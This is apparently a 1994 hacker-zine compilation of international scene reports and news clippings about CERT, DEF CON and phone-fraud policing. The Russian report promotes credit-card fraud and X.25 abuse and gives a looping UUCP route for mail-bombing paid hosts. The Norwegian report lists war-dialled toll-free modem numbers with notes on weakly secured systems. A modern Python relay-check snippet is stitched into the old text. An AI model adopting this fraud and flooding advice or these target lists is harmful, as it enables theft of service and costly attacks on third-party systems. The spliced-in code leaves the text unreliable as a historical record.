Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :) 


If u like, check out:


Free Speech Inc.   (+45) 4 582 5565   SysOp: NiteCrawler
Freeside           (+45) 3 122 3119   SysOp: Descore (Off. CJ Dist. site.)


This is it. Hope u enjoyed this little file. We are always happy to 
meet foreign hackers, so call one of the above boards and lets exchange 
accou.. ehh... intercultural hacking research information :) 


Why would you or why wouldn’t you want 
to hack in the ex-USSR or in other words 
what the hell do we do up here. 


By Digital Empiror and Stupid Fucker 


Russia is a great country, with absolutely no laws against hacking or 
phreaking, both are very easy to do and get away with. It’s for that 
reason, that most of the famous online services like CompuServe and Delphi 
closed registrations coming out of the biggest country in the world via 
SprintNet, (you guys think we still can’t get in? ... take that as a hint). 
If some great telephone company installed a payphone that can charge calls 
onto a credit card (very rare in this country) then we can use it as well, 
credit card numbers are not hard to compile, especially if you know that 
it is not really illegal. What about those great cellular telephones, you 
know, we love to use those for free, (can’t you guys get it? we know that 
we are pain in the ass, but LIVE WITH IT!). 


Most of our switchboards in Russia are very ancient, screwed up
relay-analog switches, they don’t have methods for protocol-ing
telephone calls and present undependable methods for identifying telephone
numbers. Also there is special equipment which allows making it impossible
to detect your phone number, or even making detection equipment mistake your
phone number. Interstate switchboards have to have special methods of
detecting your phone number, which are of course only accessible to
Interstate switchboards and not to the rest of commercial companies. There
was a case once where SprintNet caught one of our great hackers, but he had
sent them to his great grandfather’s (wanna try doing that with the
FBI?) because as he said ’You can’t really be sure that it was really ME
calling since in this country you can’t rely on your number detection
equipment...’


Another great thing is how the networks are set up in Russia. The greatest
and the biggest X.25 network is of course SprintNet (for which they have to
pay of course, if not them then somebody else...), it’s a little slow here,
but that’s OK. The administrators who set up the PADs are very lame and
stupid, and of course can’t set up their PADs like SprintNet would want
them to. For example, they were setting up their PAD so that it
would let you connect with virtually ANY system without asking for a NUI,
and even when they detected that hackers do it, they couldn’t do anything
besides changing their PAD instead of just changing one register!


Besides that, there is no problem with finding a NUI for Russian X.25
networks. Most of them don’t support collect calls like SprintNet, so most
Russian services that would like their customers to access their service
via X.25 give the users a unique NUI that specifies that they can only
access THIS service, but they usually forget to set it up right, so the
stupid customers, like another of our great hackers, will instead of getting
charged for the service, go to an outdial and call his favorite BBS in
Clearwater, FL for an example (do they have boards there?). I don’t know
if you like to access CitiBank machines from SprintNet, but we love to do
stuff like that. For example, recently we found a lone standing computer.
I don’t think the guys in CitiBank really understood what they were doing
when they left their modem setup option on that machine without a password;
it was a pleasure to change their modem strings knowing that it’s absolutely
legal to do so and nobody has even a right to call about it! Also there
are Internet providers in Russia, only two, from which only one is
interesting - RELCOM! Most of Internet in Russia is done via UUCP and
costs a bundle of money, so if I am in a bad mood, I’ll drop 10-20 megs of
mail into an address that doesn’t exist, and will laugh, and you know why?
In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs
of stuff, it will go through a lot of systems that will have to pay first
each other then to KIAE.SU, but there will be THE last system, that will
say ’ya know? there is no such address!’, so then the trouble will start.
So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to
a machine that does not have an IP address, better for it to go via a few of
those machines, for example, to be original:


kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root 


I am sure if you have NSLOOKUP, you can be original and make your best
route via a dozen systems. When doing it, you can be sure that it will
cause a lot of arguments from every one of that dozen concerning who will
pay for that gig (1 MB of mail in Russia costs $50 - $150, that’s enough money
for poor Russian Internet hosts).
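
An added example, not part of the original article, of the check a relay could apply before accepting source-routed mail like the path above, so that a looping or undeliverable message is refused at the first hop instead of after every system has carried it. `relay.example` stands in for the article's `<any machine in USA>`; the host table, hop limit and size limit are assumptions.

```python
# Hosts this relay knows how to reach. Constructed table: three names from
# the article's route plus a placeholder for "<any machine in USA>".
KNOWN_HOSTS = frozenset({
    "kaija.spb.su", "arcom.spb.su", "kiae.su", "relay.example",
})


def parse_bang_path(address):
    """Split 'hostA!hostB!user' into (['hosta', 'hostb'], 'user')."""
    parts = address.strip().split("!")
    if len(parts) < 2 or any(not p for p in parts):
        raise ValueError("malformed bang path")
    return [h.lower() for h in parts[:-1]], parts[-1]


def relay_decision(address, size_bytes, known_hosts=KNOWN_HOSTS,
                   max_hops=4, max_bytes=1_000_000):
    """Decide at the first hop whether to accept a source-routed message.

    Returns (accept, reason). Checks run cheapest-first and stop at the
    first failure, so the reason names the earliest problem found.
    """
    try:
        hops, _user = parse_bang_path(address)
    except ValueError as exc:
        return False, str(exc)

    # A host that appears twice means the message crosses the same paid
    # link more than once before it can even be delivered.
    seen = set()
    for host in hops:
        if host in seen:
            return False, "routing loop: %s appears twice" % host
        seen.add(host)

    # Refuse routes through hosts we cannot resolve, instead of letting the
    # last system discover that the address does not exist.
    unknown = [h for h in hops if h not in known_hosts]
    if unknown:
        return False, "unknown host: %s" % unknown[0]

    if len(hops) > max_hops:
        return False, "too many hops: %d > %d" % (len(hops), max_hops)

    if size_bytes > max_bytes:
        return False, "message too large for a source-routed path"

    return True, "ok"


if __name__ == "__main__":
    samples = [
        ("kaija.spb.su!arcom.spb.su!relay.example!kiae.su!kaija.spb.su!root",
         10 * 1024 * 1024),
        ("arcom.spb.su!nosuch.example!root", 2000),
        ("arcom.spb.su!kiae.su!root", 20 * 1024 * 1024),
        ("arcom.spb.su!kiae.su!root", 2000),
    ]
    for addr, size in samples:
        print(relay_decision(addr, size), addr)
```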


It’s all really great, but we are all on our own, and are not organized into a
group. There are not many of us and we are not known by any of our western
colleagues. To contact us, mail us at:


an58736@anon.penet.fi 


PhreeFone Numbers in Norway 
Research and Norwegian Edition by 


cyber aktiF (01-Feb-94) 


English Translation by Codex/DBA (26-Apr-1994) 


DISCLAIMER: The author of this document takes no responsibility as to how 
the information herein is used. I hope everyone who uses this 
information use it for inquisitive purposes only, and don’t 
use it for ANY destructive purposes whatsoever. 


WARNING: Unauthorized use of PBX and other communications equipment
owned by others, be it private or business, is illegal and may
result in banishment from the Norwegian telephone company
(Televerket) and/or punishment by law.
After many sporadic travels over the phone network, in other words scanning
the number region 800 3xxxx, I’ve come across several interesting things. I
therefore thought it was in its right place to make a complete list of which
numbers have a carrier and which have not. The carriers only apply to modems.
Televerket has (currently) allocated the region 800 30000 to 800 35000 for
these services.


These lines are 100% phreefone, which means that the owner of these services
pays for the conversation plus a surcharge per unit. This allows for long
permutations of numbers and passwords without adding to your own phone bill.
On the other hand, the owner of the line will have a phonebill which equals
American Express’s.


Televerket and/or the company/person supplying the service(s) have NO problem 
finding out what the caller’s number is. This is regardless whether or not 
you have filled in the "don’t reveal my number to those I call" part of 
Televerket’s connection form/document. Therefore, nosing around these numbers 
should be done with some care. 


I haven’t tried blueboxing 800 numbers (too much work for something which is 
free in the first place), but theoretically it is possible. [Codex: Would 
this lessen the number identification risk?] 


I had severe difficulties with a number which answered with an 1800Hz tone
in 1 second, after which it became silent. This box phoned me in intervals
of 5 minutes from 12:00 the next day -- in other words, an automatic
WarDial :/. If you discover the same problem, the following solution is
a guaranteed success: Program your local trunk to send all incoming calls
to ANOTHER number which answers with an 1800Hz tone. Let this be active an
hour’s time, and you should be rid of it.


-- MODEM --


The list of numbers where modem carriers are commented with a single line. I 
haven’t (at the time of writing) done a deeper investigation of any of the 
services, so none of them should be inactive. 


There are several interesting things -- especially the gateways and the
X.25 PAD. Please note that the security at most of the systems is pretty
good. Obscure terminal types, data locks and systems which won’t identify
themselves are the most common types. Someone has done a good job in making
the system safe from unauthorized sources. However, as said before,
phreefone numbers can be exposed to attacks and permutations of zimmering
quantities.


When I had a look at the unidentified services, the best way to connect was
using a raw-mode tty which won’t accept special characters. If you run a
cooked-mode terminal, the text will become even more unreadable.


-- Modem carrier tones


80030004 - Data Lock (1)
80030010 - *no output*
80030067 - *no output*
80030068 - Courier ASCII Dev. adapter
80030078 - Courier ASCII Dev. adapter
80030095 - Modem Outdial (password)
80030115 - *no output*
80030130 - *unknown*
80030180 - *unknown*
80030225 - *no output*
80030301 - *no output*
80030404 - *unknown* - prompts @ter
80030456 - *unknown* - terminal
80030485 - *unknown*
80030456 - Data Lock 4000 (1)
80030514 - garbage - password
80030606 - *no output*
80031040 - *no output*
80031065 - *no output*
80031315 - IBM Aix v3 RISC system/6000 (2)
80031470 - garbage
80031490 - Dr V.Furst. Med. Lab
80031666 - prompts - @ter
80031815 - prompts - <
80031920 - *unknown* - password
80031950 - *unknown* - hangup after 5 seconds
80032165 - Dr V.Furst. Med. Lab
80032340 - *unknown*
80032410 - Wangvs VAX/VMS
80032470 - *no output*
80032480 - Perle Model 3i V 02.00G - Apotekernes F. Innkj
80032590 - *unknown* - password
80032635 - *unknown* - terminal
80033338 - TSS Gateway (3)
80033443 - *no output*
80033490 - *no output*
80033580 - *unknown* - hangup after 5 seconds
80033601 - *no output*
80033620 - TIU Gateway (3)
80033720 - *no output*
80033815 - *unknown* - hangup after 5 seconds
80033914 - *unknown* dumps lots of texts [Codex: What type?]
80034248 - *unknown* - prompts for login
80034866 - X.25 PAD


(1) DATA LOCK 
If someone can get into one of these, he/she can look forward to getting 
a Nobel prize. Data locks are modem front-end protectors, almost 
impossible to crack without physical access. 


(2) IBM AIX
AIX is one of the best flavors of UNIX there is (even though it was
made by IBM) -- unfortunately the security at this site was so terrible
that anyone with a minimal knowledge of UNIX and access to this machine
could pull it apart blindfolded (making the life really unpleasant for
the estate agents who own the LAN. Write me for an account ;).


(3) GATEWAYS
Free internet access within grasping distance if you can break through.
Not easy, but possible. ;) I am already working on it, so I’m not sure
how long it will take until they increase the security.


[Codex: Comment about Study-By-Byte removed, as I didn’t know what to call
the school in English ;). Another fact was that since no number was provided,
and little seemed to be gained by access to this site anyway, I figured it
wasn’t too important. Get hold of cyb3rF if you really think it’s needed. ]


-- End of modem carrier listing 


-- VOICE/PBX/FAX --


Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx
region which answer. Which is what, I’ll leave up to all you people out there.
I have mapped some of the list, but won’t spread it [Codex: Yet? ;)].


Only one number per line is noted down. This is to ease the job for everyone
who’s going to (and you will try ;) run these numbers through their scanner
scripts on the lookout for PBX’s and other oddities.


Good luck guys! 


cyber aktiF - 01/02/94 
-- Answering 800 3xxxx services


-- End of list of answering 800 3xxxx services


This file was brought to you in English by Codex/DBA, 26-Apr-1994. I didn’t
ask cyb3rF for permission to translate this document, but I hope he won’t
mind. I also understand that the document is of varied use to some people
(those of you who can’t dial in free to Norway (cc 47), don’t bother), but I
thought any information, however useful might be of some interest to the
English speaking crowd out there.


Re: cyb3rF, Sicko, BattleAng, Maelstrom, Uridium, Enigma, Golan, BadS, vale_
and any other people I’ve forgotten to mention right now (flame me on
#phreak, guys ;).


I’ll be back in Norway in June.


Codex/DBA, 26-Apr-1994.


-- "But damn it, guys, wait for me!!"


More about the Argentine Internet scenery.


It’s difficult to add something to an already good article like Opii’s one,
but here is some info which may interest you besides what you already know:


* The local Net started as late as January 1989, when the National Commission
for Atomic Power (CNEA) connected to the BITNET network. The three first
nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 (IBM/370 158),
and ARGCNEA2 (Comparex 7/68), all running RSCS V1. Release 3 for data comm.


The node ARGCNBA2 was (I think it still is) the main link in Argentina to
Bitnet. Until late 1992, they still used a manual DIAL-UP LINK (!) to the
Chilean node UCHCECVM (IBM 4341M02) at the Chile’s National University in
Santiago city, connecting at 9600 bps to exchange mail. I’m not sure about
if the Chilean link is still working, due to the existing new leased line
connection of the government’s foreign office.


In mid-1990, the national university of La Plata, joined ranks and also
connected to the Bitnet network. The two nodes, CESPIVM1 and CESPIVM2
(Running on IBM mainframes) also served as hosts to a VAX 11-780, and an
experimental link to some computers in Uruguay’s (country) national
University.


Another different beast is what’s called the RAN network (National Academic
Network), which is nothing more than a UUCP network connecting a hundred
different nodes through the country. Again, until mid-92 they used X.25
ARPAC connections (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the
"international" connection into UUCO. More recently (two months ago), they
have got their own 64kbps leased line to the US, which finally will let
people around the world to mess and GET into our computers.


While the project was to connect to Maryland University (financed by the
US National Science Foundation, they love us), I still don’t know what’s the
host at the other side of the leased line.


Well, that’s the end of the FACTS that I have... now some political opinions:
Things are getting a *little* better, but I don’t expect any improvements
for "Joe average" user, since to make things work, we must get rid of the
current LD and data monopoly of the two European private telcos that own us.
(till 1999), they have the exclusive right to use and abuse the market of
both voice and data transmissions, and no competition can enter without
passing through their satellite links (and rates). Very nice for a government
that is always speaking of "free markets".


Until we get AT&T and/or MCI competing for the market, we won’t have affordable
rates, and US companies like CIS, Delphi, etc. that could be doing BIG
business NOW, will have to wait until late 1999, when the monopoly ends by
law. (Or, BTW: or they can talk to Mr. Al Gore, so he can kick a little our
beloved president to end the telcos ripoff).


Chileans, in contrast, have a lot better scene, with well-established direct
internet links, an X.25 network with 9600bps access through the country, and
even Gopher servers since a long time ago!.


Following is a quick and dirty list of Internet domains for both Chile and
Argentina:


ARGENTINA: 
ar.ar (unspecified)
athea.ar (unspecified) 


atina.ar (united nations development programme, argentina) 


ba.ar (unspecified) 
cbh.ar (unspecified) 


(RAN UUCP HOST) 


com.ar (unspecified) 

edu.ar (unspecified) 

gov.ar (government of argentina) <- give my regards to our corrupt gvt! 
mz.ar (unspecified) 

ncr.ar (national cash register corporation, argentina) 

ng.ar (unspecified) 

org.ar (centro de estudios de poblacion corrientes’,) 

sld.ar (unspecified) 


subdomain.ar (unspecified) 
test.ar (unspecified) 
tf.ar (unspecified) 

tm.ar (unspecified) 


buenosaires.ncr.ar (national cash register corporation, buenos aires, arg)
city.ar.us (unspecified)
datage.com.ar (unspecified)
guti.sld.ar (unspecified)
secyt.gov.ar (unspecified)
unisel.com.ar (unspecified)
unlp.edu.ar (universidad nacional de la plata, argentina)


CHILE: 

altos.cl (altos chile limiteda. el corregidor, santiago, chile) 

apple.cl (axis calderon, santiago, chile) 

ars.cl (ars innovandi (el arte de innovar), chile) 

bei.cl (unspecified) 

campus.cl (indae limiteda. area de computacion, manuel montt, chile) 
cepal.cl (comision economica para america latina (cepal) santiago, chile) 
conicyt.cl (unspecified) <-- Government education branch

contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile) 
cronus.cl (familia fuentealba olea, chile) <-- a family with their node! 


difusion.cl (editorial difusion, chile) 
eclac.cl (unspecified) 
epson.cl (epson, chile) 


eso.cl (european southern observatory la silla, la serena, chile) 

frutex.cl (frutexport lota, santiago, chile) 

fundch.cl (fundacion, chile) 

fwells.cl (fundacion wells claro solar, casilla, temuco, chile) 

gob.cl (unspecified) <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet! 
ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile) 

lascar.cl (university of catolica, chile) 

mic.cl (las condes, santiago, chile) 

ncr.cl (national cash register corporation, chile)
opta.cl (opta limiteda. las violetas, idencia, santiago, chile)
orden.cl (orden huerfanos piso, fax, santiago, chile)
placer.cl (placer dome) <-- WHAT IS THIZ??? "Pleasure dome?" !!!!!!
puc.cl (catholic university of chile (universidad catolica de chile) 
rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile) 
safp.cl (superintendencia de administradoras de fondos de pensiones, chil 
scharfs.cl (scharfstein, las condes, santiago, chile) 

sisteco.cl (sisteco, santiago, chile) 


sonda.cl (sonda digital teatinos, santiago, chile)
tes.cl (d.c.c. sistemas, chile)
uai.cl (unspecified)
ubiobio.cl (unspecified)
uchile.cl (universidad de chile)
ucv.cl (unspecified)
udec.cl (universidad de concepcion de ingenieria de sistemas, )
unisys.cl (unisys, chile)
unorte.cl (universidad del norte, antofagasta, chile)
usach.cl (universidad de santiago de chile de ingenieria informatica, )
uta.cl (universidad de tarapaca, arica, chile)
utfsm.cl (universidad tecnica de electronica, valparaiso, chile)

ac.cam.cl (unspecified) 

agr.puc.cl (agriculture department, catholic university of chile 
astro.puc.cl (catholic university of chile (pontificia universidad catolica 


bio.puc.cl (catholic university of chile santiago) 

cec.uchile.cl (universidad de chile) 

cfm.udec.cl (universidad de concepcion, concepcion, chile) 
dec.uchile.cl (department o. de ciencias de la computacion) 
dfi.uchile.cl (universidad de chile) 

die.udec.cl (universidad de concepcion de ingenieria de sistemas) 
dii.uchile.cl (universidad de chile) 

dim.uchile.cl (universidad de chile) 

dis.udec.cl (universidad de concepcion, concepcion, chile) 
disca.utfsm.cl (universidad tecnica federico santa maria, chile) 
dpi.udec.cl (universidad de concepcion de ingenieria de sistemas) 
elo.utfsm.cl (universidad tecnica federico santa maria, ) 
finanzas.fundch.cl (fundacion, chile) 

fis.utfsm.cl (universidad tecnica federico santa maria, ) 
inf.utfsm.cl (universidad tecnica federico santa maria, ) 


ing.puc.cl (engineering, catholic university of chile ) 

mat.puc.cl (mathematics department, catholic university of chile 
mat.utfsm.cl (universidad tecnica federico santa maria, 

qui.puc.cl (catholic university of chile santiago) 

seci.uchile.cl (universidad de chile) 

soft.udec.cl (universidad de concepcion de ingenieria de sistemas, ) 


Australian Scene Report Part II 
by Data King 


This is the sequel to the Australian scene report that appeared in Phrack 
Issue 45. There have been a few developments since I wrote that report which I 
think people may be interested in. 


But first, before I deal with what’s new, I need to deal with something that’s
old. Shortly after Phrack 45 was published, I received a fakemail that
basically threatened me and also made a lot of claims. I would like to take
this opportunity to reply to the author of this letter.


First of all this person claims I have not been in the scene for ages, well 
if I am not in the scene that is news to me! 


The letter contained several threats to do something like redirect my 
telephone number to a 0055 number, for people outside of Australia, a 0055 
is a recorded timed call service. 


To this I say: ’Go ahead, if you’re capable DO IT!’


I won’t bother dealing with most of the rubbish contained in the article, it
was just general BS. 


Finally I have something to say directly to the person who wrote the mail:
"If you’re so goddamn good, then don’t hide behind fakemail, come out in the
open and let us all fear you, come on, get your lame ass on IRC and let’s talk!"


Also I was told not to submit anything more to Phrack for publishing or bad 
things would happen, Well I guess either I have no phear, or I don’t take 
these threats seriously. 


New NEWS 


AusCERT


Australia is forming its own version of CERT, to be called AusCERT and
based in Queensland, Australia. Everybody is shaking in their boots worrying
-- NOT!


Networks


In the last report you may remember I talked about the Australia Military
Network in a very vague fashion, well now I have some more detailed info for
you.


The Australian Defense Forces (ADF) have what they call "the Defense 
Integrated Secure Communications Network (DISCON)". This network is 
relatively new. Circuit switched operations only began in 1990. Packet 
switching came into effect during 1992. 


It provides all the ADF’s communication needs in terms of data, voice, 
video, and so on, secure and non secure communications. 


Main control is exercised from Canberra (believed to be from within the DSD 
compound at Russell Offices), and the network is interconnected via a total 
of 11 ground stations across the country using Aussat. 


Also the Australian Federal Police have an internet connection now. 
sentry.afp.gov.au is the main machine from what I can tell, from the looks 
of it, the machine is either a setup or they don’t know much about security. 


NeuroCon 


There was a Con organized by The Pick held here in Melbourne a little while 
ago, from all reports it was a total disaster, once again showing the apathy 
of Australian people in the scene. 


For instance the organizers kept the location secret, and were supposed to
pick people up in the city, at several allocated times they did not show up. 


When one of the potential attendees rang and asked what was going on they 
were told by the organizers: "We are too drunk to come and get you". 


Come on guys this is LAME, sure everyone likes a drink, but if you keep the
location secret, make sure someone is able to go and get the people waiting 
to be picked up! 


HackFEST 94 


The Year is quickly approaching an end and as yet I have not managed to
fully organize this event. I am in need of people who wish to speak on various
topics, so if you are so inclined and have an idea, send me mail and we will 
see what we can organize. 


As always I can be contacted at dking@suburbia.apana.org.au, but please note 
my PGP signature has changed, so please do a finger on the account if you want 
my new PGP signature. 


Information in this article has come from various sources, but they shall 
remain nameless as they do not wish the attention of the AFP. They know who 
they are, and I send them my thanks - Thanks Guys!


Damn The Torpedoes June 6, 1994
by Loring Wirbel (Electronic Engineering Times) (Page 134) 


On May 3, a gargantuan satellite was launched with little press coverage 
from Cape Canaveral. 


The $1.5 billion satellite is a joint project of the NSA and the 
National Reconnaissance Office. At five tons, it is heavy enough to 
have required every bit of thrust its Titan IV launcher could
provide, and despite the boost, it still did enough damage to the
launch-pad water main to render the facility unusable for two months. 


The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an 
antenna larger than a football field to carry out "hyper-spectral 
analysis" -- Reconnaissance Office buzzwords for real-time analysis of 
communications in a very wide swath of the electromagnetic spectrum. 


Clipper and Digital Signature Standard opponents should be paying 
attention to this one. Mentor surprised space analysts by moving into a 
geostationary rather than geosynchronous orbit. Geostationary orbit 
allows the satellite to "park" over a certain sector of the earth. 


This first satellite in a planned series was heading for the Ural 
Mountains in Russia at last notice. Additional launches planned for 
late 1994 will park future Mentors over the western hemisphere.


According to John Pike of the Federation of American Scientists, those 
satellites will likely be controlled from Buckley Field (Aurora, 
Colorado), an NSA/Reconnaissance downlink base slated to become this 
hemisphere’s largest intelligence base in the 1990s. 


[Able to hear a bug fart from space. DC to Daylight realtime analysis. 
And you Clipper whiners cry about someone listening to your phone calls. 
Puh-lease. ] 


Discovery of ’Data Processing Virus Factory’ In Italy February 17, 1994 


AFP Sciences 


It was learned in Rome on 10 February that a data processing virus 
"factory" -- in fact, a program called VCL (Viruses Creation Laboratory), 
capable of triggering a virus epidemic -- was discovered in Italy.


Mr. Fulvio Berghella, deputy director-general of the Italian Institute
for Bank Data Processing Security (ISTINFORM), discovered what it takes
to enable just about anybody to fabricate data processing viruses; he told
the press that its existence had been suspected for a year and a half and 
that about a hundred Italian enterprises had been "contaminated." 


An investigation was launched to try to determine the origin of the program,
said Mr. Alessandro Pansa, chief of the "data processing crime" section
of the Italian police. Several copies of VCL were found in various places,
particularly in Rome and Milan.


Producing viruses is very simple with the help of this program, but it is
not easy to find. A clandestine Bulgarian data bank, as yet not identified,
reportedly was behind all this. An international meeting of data processing
virus "hunters" was organized in Amsterdam on 12 February to draft
a strategy; an international police meeting on this subject will be held
next week in Sweden.


Since 1991, the number of viruses in circulation throughout the world 
increased 500% to a total of about 10,000 viruses. In Italy, it is not 
forbidden to own a program of this type, but dissemination of viruses 
is prosecuted. 


[So, I take it Nowhere Man cannot ever travel to Italy?] 


DEFCON TV-News Coverage July 26, 1994 
by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles) 


[Shot of audience] 


Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal 
Eisner found at a gathering of hackers on the Las 
Vegas strip." 


[Shot of "Welcome to Vegas" sign] 
[Shot of Code Thief Deluxe v3.5] 
[Shot of Dark Tangent talking] 


Dark Tangent: "Welcome to the convention!" 


[Shot of Voyager hanging with some people] 


Hal Eisner: "Well not everyone was welcome to this year’s 
Def Con II, a national convention for hackers. 
Certainly federal agents weren’t." 

[Shot DTangent searching for a fed] 

Dark Tangent: "On the right. Getting closer." 


Fed: "Must be me! Thank you." 


[Dark Tangent gives the Fed "I’m a Fed" t-shirt] 


Hal Eisner: "Suspected agents were ridiculed and given
identifying t-shirts. While conventioneers, some of
[Shot of someone using a laptop]
which have violated the law, and many of which are
[Shot of some guy reading the DefCon pamphlet]
simply tech-heads hungry for the latest theory, got
[Shot of a frequency counter, and a scanner]
to see a lot of the newest gadgetry, and hear some
tough talk from an Arizona Deputy DA that
[Shot of Gail giving her speech]
specializes on computer crime and actually
recognized some of her audience."


Gail: "Some people are outlaws, crooks, felons maybe." 


[Shot back of conference room. People hanging] 


Hal Eisner: "There was an Alice in Wonderland quality about all 
of this. Hackers by definition go where they are not 
invited, but so is the government that is trying to 
intrude on their privacy."


Devlin: "If I want to conceal something for whatever reason.
I’d like to have the ability to." 


Hal Eisner: "The bottom line is that many of the people here
want to do what they want, when they want, and how 
they want, without restrictions." 


Deadkat: "What we are doing is changing the system, and if you 
have to break the law to change the system, so be it!" 


Hal Eisner: "That’s from residents of that cyberspacious world
[Shot of someone holding a diskette with what is supposed to be codez on the
label]
of behind the computer screen where the shy can be
[Code Thief on the background]
dangerous. Reporting from Las Vegas, Hal Eisner,
Real News."


Cyber Cops May 23, 1994 


by Joseph Panettieri (Information Week) (Page 30) 


When Chris Myers, a software engineer at Washington University in
St. Louis, arrived to work one Monday morning last month, he realized
something wasn’t quite right. Files had been damaged and a back door
was left ajar. Not in his office, but on the university’s computer network.


Like Commissioner Gordon racing to the Batphone, Myers swiftly called the 
Internet’s guardian, the Computer Emergency Response Team (CERT). 


The CERT team boasts impressive credentials. Its 14 team members are
managed by Dain Gary, former director of corporate data security at 
Mellon Bank Corp. in Pittsburgh. While Gary is the coach of the CERT 
squad, Moira West is the scrambling on-field quarterback. As manager 
of CERT’s incident-response team and coordination center, she oversees 
the team’s responses to attacks by Internet hackers and its search for 
ways to reduce the Internet’s vulnerabilities. West was formerly a 
software engineer at the University of York in England. 


The rest of the CERT team remains in the shadows. West says
the CERT crew hails from various information-systems backgrounds,
but declines to get more specific, possibly to hide any Achilles’ 
heels from hackers. 


One thing West stresses is that CERT isn’t a collection of reformed 
hackers combing the Internet for suspicious data. "People have to 
trust us, so hiring hackers definitely isn’t an option," she says. 
"And we don’t probe or log-on to other people’s systems." 


As a rule, CERT won’t post an alert until after it finds a
remedy to the problem. But that can take months, giving hackers
time to attempt similar breakins on thousands of Internet hosts 
without fear of detection. Yet CERT’s West defends this policy: 
"We don’t want to cause mass hysteria if there’s no way to 
address a new, isolated problem. We also don’t want to alert the 
entire intruder community about it." 


Who You Gonna Call? 
How to reach CERT 


Phone: 412-268-7090 

Internet: cert@cert.org 

Fax: 412-268-6989 

Mail: CERT Coordination Center 
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, PA 15213-3890 


[Ask for that saucy British chippie. Her voice will melt you like 
butter. 
CERT -- Continually re-emphasizing the adage: "You get what you pay for!"] 


And remember, CERT doesn’t hire hackers, they just suck the juicy bits 
out of their brains for free. 


Defining the Ethics of Hacking August 12, 1994 


by Amy Harmon (Los Angeles Times) (page A1)


Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer 
hackers and phone phreaks -- is having a party. 


And perhaps it is just in time. 2600, the hacker magazine Corley 
started when he was 23, is a decade old. It has spawned monthly 
hacker meetings in dozens of cities. It has been the target of a 
Secret Service investigation. It has even gone aboveground, with 
newsstand sales of 20,000 last year. 


As hundreds of hackers converge in New York City this weekend to celebrate
2600’s anniversary, Corley hopes to grapple with how to uphold the
"hacker ethic," an oxymoron to some, in an era when many of 2600’s devotees
just want to know how to make free phone calls. (Less high-minded
activities -- like cracking the New York City subway’s new electronic
fare card system -- are also on the agenda).


Hackers counter that in a society increasingly dependent on
technology, the very basis for democracy could be threatened by limiting
technological exploration. "Hacking teaches people to think critically about 
technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers 
on Planet Earth conference this weekend. "The corporations that are building 
the technology are certainly not going to tell us, because they’re trying to 
sell it to us. Whole societies are trusting technology blindly -- they just 
believe what the technocrats say." 


Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic,
which made waves this year with an article showing that while tapping mobile
phones of criminal suspects with radio scanners, Dutch police tapped into
thousands of other mobile phones.


"What society needs is people who are independent yet knowledgeable," 
Gonggrijp said. "That’s mostly going to be young people, which society is
uncomfortable with. But there’s only two groups who know how the phone and 
computer systems work, and that’s engineers and hackers. And I think that’s 
a very healthy situation." 


[By the way Amy: Phrack always grants interviews to cute, female 
LA Times reporters. ] 


Fighting Telephone Fraud August 1, 1994 


by Barbara DePompa (Information Week) (Page 74) 


Local phone companies are taking an active role in warning customers of 
scams and cracking down on hackers. 


Early last month, a 17-year old hacker in Baltimore was caught 
red-handed with a list of more than 100 corporate authorization codes that 
would have enabled fraud artists to access private branch exchanges and
make outgoing calls at corporate expense.


After the teenager’s arrest, local police shared the list with Bell 
Atlantic’s fraud prevention group. Within hours, the phone numbers were
communicated to the appropriate regional phone companies and corporate 
customers on the list were advised to either change their authorization 
codes or shut down outside dialing privileges. 


"We can’t curb fraud without full disclosure and sharing this type 
of vital information" points out Mary Chacanias, manager of 
telecommunications fraud prevention for Bell Atlantic in Arlington, VA. 


AT&T Forms Team to Track Hackers August 30, 1994 
(Reuters News Wire)

AT&T Corp.’s Global Business Communications Systems subsidiary said
Wednesday it has formed an investigative unit to monitor, track and
catch phone-system hackers in the act of committing toll fraud.

The unit will profile hacker activity and initiate "electronic
stakeouts" with its business communications equipment in cooperation
with law enforcement agencies, and work with them to prosecute the
thieves.

"We’re in a shoot-out between ‘high-tech cops’ -- like AT&T -- and
‘high-tech robbers’ who brazenly steal long distance service from our
business customers," said Kevin Hanley, marketing director for business
security systems for AT&T Global Business.

"Our goal is not only to defend against hackers but to get them off the
street."

[Oh my God. Are you scared? Have you wet yourself? YOU WILL! ] 

Former FBI Informant a Fugitive July 31, 1994 


by Keith Stone (Daily News) 


Computer outlaw Justin Tanner Petersen and prosecutors 
cut a deal: The Los Angeles nightclub promoter known in 
the computer world as "Agent Steal" would work for the 
government in exchange for freedom. 


With his help, the government built its case against 
Kevin Lee Poulsen, a Pasadena native who pleaded guilty 
in June to charges he electronically rigged telephones at 
Los Angeles radio stations so he could win two Porsches, 
$22,000 and two trips to Hawaii. 


Petersen also provided information on Kevin Mitnick, a 
Calabasas man wanted by the FBI for cracking computer and 
telephone networks at Pacific Bell and the state Department 
of Motor Vehicles, according to court records. 


Petersen’s deal lasted for nearly two years - until 
authorities found that while he was helping them undercover, 
he also was helping himself to other people’s credit cards. 


Caught but not cornered, the 34-year-old "Agent Steal" had 
one more trick: He admitted his wrongdoing to a prosecutor 
at the Los Angeles U.S. Attorney’s Office, asked to meet 
with his attorney and then said he needed to take a walk. 


And he never came back. 


A month after Petersen fled, he spoke with a magazine for 
computer users about his role as an FBI informant, who he 
had worked against and his plans for the future.


"I have learned a lot about how the bureau works. Probably
too much," he said in an interview that Phrack Magazine published
Nov. 17, 1993. Phrack is available on the Internet, a worldwide 
network for computer users. 


Petersen told the magazine that working with the FBI was fun 
most of the time. "There was a lot of money and resources used. 
In addition, they paid me well," he said. 


"If I didn’t cooperate with the bureau," he told Phrack, "I 
could have been charged with possession of government material." 


